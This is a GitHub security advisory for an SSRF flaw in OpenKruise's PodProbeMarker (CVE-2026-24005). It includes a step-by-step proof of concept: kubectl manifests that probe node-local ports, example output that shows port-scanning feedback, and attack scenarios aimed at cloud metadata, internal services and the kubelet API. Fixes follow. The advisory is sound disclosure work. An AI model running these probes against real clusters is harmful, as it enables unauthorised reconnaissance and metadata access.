GHSA-9FJ4-3849-RV9G

Vulnerability from github – Published: 2026-02-25 18:30 – Updated: 2026-02-27 21:48
VLAI?
Summary
OpenKruise PodProbeMarker is Vulnerable to SSRF via Unrestricted Host Field
Details

Summary

PodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers. The webhook validation does not restrict the Host field in these probe configurations. Since kruise-daemon runs with hostNetwork=true, it executes probes from the node network namespace. An attacker with PodProbeMarker creation permission can specify arbitrary Host values (127.0.0.1, 169.254.169.254, internal IPs) to trigger SSRF from the node, perform port scanning, and receive response feedback through NodePodProbe status messages.

Kubernetes Version

  • Kubernetes: v1.30.0 (kind cluster)
  • Distribution: kind

Component Version

  • OpenKruise: v1.8.0
  • kruise-daemon: DaemonSet with hostNetwork=true
  • Affected CRDs: PodProbeMarker, NodePodProbe

Steps To Reproduce

Environment Setup

  1. Install OpenKruise v1.8.0 in kind cluster:
helm repo add openkruise https://openkruise.github.io/charts/
helm install kruise openkruise/kruise --version 1.8.0 \
  --namespace kruise-system --create-namespace
  1. Verify kruise-daemon runs with hostNetwork:
kubectl -n kruise-system get ds kruise-daemon -o yaml | grep hostNetwork

Output:

hostNetwork: true
  1. Create test namespace and RBAC:
kubectl apply -f - <<EOF
apiVersion: v1
kind: Namespace
metadata:
  name: tenant-a
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: attacker
  namespace: tenant-a
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ppm-creator
  namespace: tenant-a
rules:
- apiGroups: ["apps.kruise.io"]
  resources: ["podprobemarkers"]
  verbs: ["create","get","list","watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: ppm-creator-binding
  namespace: tenant-a
subjects:
- kind: ServiceAccount
  name: attacker
  namespace: tenant-a
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: ppm-creator
EOF
  1. Deploy victim workload:
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: victim
  namespace: tenant-a
spec:
  replicas: 1
  selector:
    matchLabels:
      app: victim
  template:
    metadata:
      labels:
        app: victim
    spec:
      containers:
      - name: victim
        image: busybox:1.36
        command: ["/bin/sh","-c","sleep 36000"]
EOF

Exploitation Steps

  1. Verify node-local port accessibility (kubelet healthz):
NODE_CONTAINER=$(docker ps --format '{{.Names}}' | grep control-plane)
docker exec $NODE_CONTAINER curl -s -o /dev/null -w "%{http_code}" http://127.0.0.1:10248/healthz

Output:

200
  1. Create SSRF PodProbeMarker targeting node-local port (as attacker):
kubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF
apiVersion: apps.kruise.io/v1alpha1
kind: PodProbeMarker
metadata:
  name: ppm-tcp-ssrf
  namespace: tenant-a
spec:
  selector:
    matchLabels:
      app: victim
  probes:
  - name: tcp-ssrf
    containerName: victim
    podConditionType: ssrf.kruise.io/tcp
    probe:
      tcpSocket:
        host: 127.0.0.1
        port: 10248
      timeoutSeconds: 2
      periodSeconds: 5
EOF

Output:

podprobemarker.apps.kruise.io/ppm-tcp-ssrf created
  1. Wait for probe execution and observe SSRF result:
sleep 10
NODE_NAME=$(kubectl get nodes -o jsonpath='{.items[0].metadata.name}')
kubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 20 "ppm-tcp-ssrf"

Output:

      name: ppm-tcp-ssrf#tcp-ssrf
      probe:
        tcpSocket:
          host: 127.0.0.1
          port: 10248
status:
  podProbeStatuses:
  - name: victim-8596ff64d6-jklnb
    namespace: tenant-a
    probeStates:
    - lastProbeTime: "2026-01-13T17:48:10Z"
      name: ppm-tcp-ssrf#tcp-ssrf
      state: Succeeded

Evidence: Probe succeeded, confirming kruise-daemon accessed node-local port 127.0.0.1:10248 from node network namespace.

  1. Demonstrate port scanning capability (closed port):
kubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF
apiVersion: apps.kruise.io/v1alpha1
kind: PodProbeMarker
metadata:
  name: ppm-tcp-closed
  namespace: tenant-a
spec:
  selector:
    matchLabels:
      app: victim
  probes:
  - name: tcp-closed
    containerName: victim
    podConditionType: ssrf.kruise.io/tcp-closed
    probe:
      tcpSocket:
        host: 127.0.0.1
        port: 9999
      timeoutSeconds: 2
      periodSeconds: 5
EOF
  1. Observe port scanning result:
kubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 5 "ppm-tcp-closed"

Output:

    - lastProbeTime: "2026-01-13T17:51:08Z"
      message: 'dial tcp 127.0.0.1:9999: connect: connection refused'
      name: ppm-tcp-closed#tcp-closed
      state: Failed

Evidence: Failed probe with "connection refused" message enables port state differentiation for scanning.

  1. Verify Pod condition and events:
VICTIM_POD=$(kubectl -n tenant-a get pod -l app=victim -o jsonpath='{.items[0].metadata.name}')
kubectl -n tenant-a describe pod $VICTIM_POD | grep -A 10 "Conditions:"

Output:

Conditions:
  Type                        Status
  ssrf.kruise.io/tcp          True
  ssrf.kruise.io/tcp-closed   False

Events:
  Normal  KruiseProbeSucceeded  96s (x24 over 3m26s)  kruise-daemon-podprobe

Source Code Evidence

  1. TCPSocket Host field used without restriction:

File: pkg/daemon/podprobe/prober.go

func (pb *prober) newTCPSocketProber(tcp *v1.TCPSocketAction, podIP string) tcpProber {
    host := tcp.Host
    if host == "" {
        host = podIP
    }
    return tcpProber{
        tcp: tcp,
        host: host,
    }
}
  1. Webhook validation does not check Host field:

File: pkg/webhook/podprobemarker/validating/probe_create_update_handler.go

func validateTCPSocketAction(tcp *corev1.TCPSocketAction, fldPath *field.Path) field.ErrorList {
    return ValidatePortNumOrName(tcp.Port, fldPath.Child("port"))
}

Note: Only port validation, no Host restriction.

Attack Scenarios

Scenario 1 - Cloud metadata access:

probe:
  tcpSocket:
    host: 169.254.169.254
    port: 80

Scenario 2 - Internal service discovery:

probe:
  tcpSocket:
    host: 10.0.0.1
    port: 6379

Scenario 3 - Node-local kubelet API:

probe:
  tcpSocket:
    host: 127.0.0.1
    port: 10250

Supporting Material/References

Verification Evidence

  1. kruise-daemon hostNetwork configuration:
$ kubectl -n kruise-system get ds kruise-daemon -o yaml | grep -A 2 "hostNetwork"
      hostNetwork: true
      restartPolicy: Always
  1. Successful SSRF to open port (127.0.0.1:10248):
status:
  podProbeStatuses:
    probeStates:
    - name: ppm-tcp-ssrf#tcp-ssrf
      state: Succeeded
  1. Port scanning result for closed port (127.0.0.1:9999):
status:
  podProbeStatuses:
    probeStates:
    - message: 'dial tcp 127.0.0.1:9999: connect: connection refused'
      name: ppm-tcp-closed#tcp-closed
      state: Failed
  1. Pod condition reflecting probe results:
Conditions:
  Type                        Status
  ssrf.kruise.io/tcp          True
  ssrf.kruise.io/tcp-closed   False

Impact Assessment

  • Confidentiality: Medium-High. Access to node-local services, cloud metadata, internal network resources.
  • Integrity: Low. Primarily information disclosure.
  • Availability: Medium. Resource consumption from probe requests.

Limitations

HTTPGet probe rejected by webhook in OpenKruise v1.8.0:

Error: admission webhook denied the request: spec.probe.probe: Forbidden: current no support http probe

TCPSocket probe remains vulnerable.

Remediation

Temporary mitigation: - Restrict PodProbeMarker creation permissions - Apply network policies limiting kruise-daemon egress - Audit existing PodProbeMarker resources

Permanent fix: - Enforce Host field restrictions in webhook validation - Deny private IP ranges (127.0.0.0/8, 10.0.0.0/8, 169.254.0.0/16) - Require Host to be empty or equal to PodIP - Sanitize error messages in NodePodProbe status


Verification Environment: kind v1.30.0 + OpenKruise v1.8.0

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openkruise/kruise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.8.0"
            },
            {
              "fixed": "1.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openkruise/kruise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24005"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:30:40Z",
    "nvd_published_at": "2026-02-25T19:43:21Z",
    "severity": "LOW"
  },
  "details": "## Summary\n\nPodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers. The webhook validation does not restrict the Host field in these probe configurations. Since kruise-daemon runs with hostNetwork=true, it executes probes from the node network namespace. An attacker with PodProbeMarker creation permission can specify arbitrary Host values (127.0.0.1, 169.254.169.254, internal IPs) to trigger SSRF from the node, perform port scanning, and receive response feedback through NodePodProbe status messages.\n\n## Kubernetes Version\n\n- Kubernetes: v1.30.0 (kind cluster)\n- Distribution: kind\n\n## Component Version\n\n- OpenKruise: v1.8.0\n- kruise-daemon: DaemonSet with hostNetwork=true\n- Affected CRDs: PodProbeMarker, NodePodProbe\n\n## Steps To Reproduce\n\n### Environment Setup\n\n1. Install OpenKruise v1.8.0 in kind cluster:\n```bash\nhelm repo add openkruise https://openkruise.github.io/charts/\nhelm install kruise openkruise/kruise --version 1.8.0 \\\n  --namespace kruise-system --create-namespace\n```\n\n2. Verify kruise-daemon runs with hostNetwork:\n```bash\nkubectl -n kruise-system get ds kruise-daemon -o yaml | grep hostNetwork\n```\nOutput:\n```\nhostNetwork: true\n```\n\n3. Create test namespace and RBAC:\n```bash\nkubectl apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Namespace\nmetadata:\n  name: tenant-a\n---\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n  name: attacker\n  namespace: tenant-a\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: ppm-creator\n  namespace: tenant-a\nrules:\n- apiGroups: [\"apps.kruise.io\"]\n  resources: [\"podprobemarkers\"]\n  verbs: [\"create\",\"get\",\"list\",\"watch\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: ppm-creator-binding\n  namespace: tenant-a\nsubjects:\n- kind: ServiceAccount\n  name: attacker\n  namespace: tenant-a\nroleRef:\n  apiGroup: rbac.authorization.k8s.io\n  kind: Role\n  name: ppm-creator\nEOF\n```\n\n4. Deploy victim workload:\n```bash\nkubectl apply -f - \u003c\u003cEOF\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n  name: victim\n  namespace: tenant-a\nspec:\n  replicas: 1\n  selector:\n    matchLabels:\n      app: victim\n  template:\n    metadata:\n      labels:\n        app: victim\n    spec:\n      containers:\n      - name: victim\n        image: busybox:1.36\n        command: [\"/bin/sh\",\"-c\",\"sleep 36000\"]\nEOF\n```\n\n### Exploitation Steps\n\n5. Verify node-local port accessibility (kubelet healthz):\n```bash\nNODE_CONTAINER=$(docker ps --format \u0027{{.Names}}\u0027 | grep control-plane)\ndocker exec $NODE_CONTAINER curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:10248/healthz\n```\nOutput:\n```\n200\n```\n\n6. Create SSRF PodProbeMarker targeting node-local port (as attacker):\n```bash\nkubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - \u003c\u003cEOF\napiVersion: apps.kruise.io/v1alpha1\nkind: PodProbeMarker\nmetadata:\n  name: ppm-tcp-ssrf\n  namespace: tenant-a\nspec:\n  selector:\n    matchLabels:\n      app: victim\n  probes:\n  - name: tcp-ssrf\n    containerName: victim\n    podConditionType: ssrf.kruise.io/tcp\n    probe:\n      tcpSocket:\n        host: 127.0.0.1\n        port: 10248\n      timeoutSeconds: 2\n      periodSeconds: 5\nEOF\n```\nOutput:\n```\npodprobemarker.apps.kruise.io/ppm-tcp-ssrf created\n```\n\n7. Wait for probe execution and observe SSRF result:\n```bash\nsleep 10\nNODE_NAME=$(kubectl get nodes -o jsonpath=\u0027{.items[0].metadata.name}\u0027)\nkubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 20 \"ppm-tcp-ssrf\"\n```\nOutput:\n```yaml\n      name: ppm-tcp-ssrf#tcp-ssrf\n      probe:\n        tcpSocket:\n          host: 127.0.0.1\n          port: 10248\nstatus:\n  podProbeStatuses:\n  - name: victim-8596ff64d6-jklnb\n    namespace: tenant-a\n    probeStates:\n    - lastProbeTime: \"2026-01-13T17:48:10Z\"\n      name: ppm-tcp-ssrf#tcp-ssrf\n      state: Succeeded\n```\n\nEvidence: Probe succeeded, confirming kruise-daemon accessed node-local port 127.0.0.1:10248 from node network namespace.\n\n8. Demonstrate port scanning capability (closed port):\n```bash\nkubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - \u003c\u003cEOF\napiVersion: apps.kruise.io/v1alpha1\nkind: PodProbeMarker\nmetadata:\n  name: ppm-tcp-closed\n  namespace: tenant-a\nspec:\n  selector:\n    matchLabels:\n      app: victim\n  probes:\n  - name: tcp-closed\n    containerName: victim\n    podConditionType: ssrf.kruise.io/tcp-closed\n    probe:\n      tcpSocket:\n        host: 127.0.0.1\n        port: 9999\n      timeoutSeconds: 2\n      periodSeconds: 5\nEOF\n```\n\n9. Observe port scanning result:\n```bash\nkubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 5 \"ppm-tcp-closed\"\n```\nOutput:\n```yaml\n    - lastProbeTime: \"2026-01-13T17:51:08Z\"\n      message: \u0027dial tcp 127.0.0.1:9999: connect: connection refused\u0027\n      name: ppm-tcp-closed#tcp-closed\n      state: Failed\n```\n\nEvidence: Failed probe with \"connection refused\" message enables port state differentiation for scanning.\n\n10. Verify Pod condition and events:\n```bash\nVICTIM_POD=$(kubectl -n tenant-a get pod -l app=victim -o jsonpath=\u0027{.items[0].metadata.name}\u0027)\nkubectl -n tenant-a describe pod $VICTIM_POD | grep -A 10 \"Conditions:\"\n```\nOutput:\n```\nConditions:\n  Type                        Status\n  ssrf.kruise.io/tcp          True\n  ssrf.kruise.io/tcp-closed   False\n\nEvents:\n  Normal  KruiseProbeSucceeded  96s (x24 over 3m26s)  kruise-daemon-podprobe\n```\n\n### Source Code Evidence\n\n11. TCPSocket Host field used without restriction:\n\nFile: `pkg/daemon/podprobe/prober.go`\n```go\nfunc (pb *prober) newTCPSocketProber(tcp *v1.TCPSocketAction, podIP string) tcpProber {\n    host := tcp.Host\n    if host == \"\" {\n        host = podIP\n    }\n    return tcpProber{\n        tcp: tcp,\n        host: host,\n    }\n}\n```\n\n12. Webhook validation does not check Host field:\n\nFile: `pkg/webhook/podprobemarker/validating/probe_create_update_handler.go`\n```go\nfunc validateTCPSocketAction(tcp *corev1.TCPSocketAction, fldPath *field.Path) field.ErrorList {\n    return ValidatePortNumOrName(tcp.Port, fldPath.Child(\"port\"))\n}\n```\n\nNote: Only port validation, no Host restriction.\n\n### Attack Scenarios\n\nScenario 1 - Cloud metadata access:\n```yaml\nprobe:\n  tcpSocket:\n    host: 169.254.169.254\n    port: 80\n```\n\nScenario 2 - Internal service discovery:\n```yaml\nprobe:\n  tcpSocket:\n    host: 10.0.0.1\n    port: 6379\n```\n\nScenario 3 - Node-local kubelet API:\n```yaml\nprobe:\n  tcpSocket:\n    host: 127.0.0.1\n    port: 10250\n```\n\n## Supporting Material/References\n\n### Verification Evidence\n\n1. kruise-daemon hostNetwork configuration:\n```bash\n$ kubectl -n kruise-system get ds kruise-daemon -o yaml | grep -A 2 \"hostNetwork\"\n      hostNetwork: true\n      restartPolicy: Always\n```\n\n2. Successful SSRF to open port (127.0.0.1:10248):\n```yaml\nstatus:\n  podProbeStatuses:\n    probeStates:\n    - name: ppm-tcp-ssrf#tcp-ssrf\n      state: Succeeded\n```\n\n3. Port scanning result for closed port (127.0.0.1:9999):\n```yaml\nstatus:\n  podProbeStatuses:\n    probeStates:\n    - message: \u0027dial tcp 127.0.0.1:9999: connect: connection refused\u0027\n      name: ppm-tcp-closed#tcp-closed\n      state: Failed\n```\n\n4. Pod condition reflecting probe results:\n```\nConditions:\n  Type                        Status\n  ssrf.kruise.io/tcp          True\n  ssrf.kruise.io/tcp-closed   False\n```\n\n### Impact Assessment\n\n- Confidentiality: Medium-High. Access to node-local services, cloud metadata, internal network resources.\n- Integrity: Low. Primarily information disclosure.\n- Availability: Medium. Resource consumption from probe requests.\n\n### Limitations\n\nHTTPGet probe rejected by webhook in OpenKruise v1.8.0:\n```\nError: admission webhook denied the request: spec.probe.probe: Forbidden: current no support http probe\n```\n\nTCPSocket probe remains vulnerable.\n\n### Remediation\n\nTemporary mitigation:\n- Restrict PodProbeMarker creation permissions\n- Apply network policies limiting kruise-daemon egress\n- Audit existing PodProbeMarker resources\n\nPermanent fix:\n- Enforce Host field restrictions in webhook validation\n- Deny private IP ranges (127.0.0.0/8, 10.0.0.0/8, 169.254.0.0/16)\n- Require Host to be empty or equal to PodIP\n- Sanitize error messages in NodePodProbe status\n\n---\n\n**Verification Environment**: kind v1.30.0 + OpenKruise v1.8.0",
  "id": "GHSA-9fj4-3849-rv9g",
  "modified": "2026-02-27T21:48:39Z",
  "published": "2026-02-25T18:30:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/security/advisories/GHSA-9fj4-3849-rv9g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24005"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/commit/94364b76adf3e8a1749a31afe809a163bed29613"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openkruise/kruise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/releases/tag/v1.7.5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openkruise/kruise/releases/tag/v1.8.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenKruise PodProbeMarker is Vulnerable to SSRF via Unrestricted Host Field"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…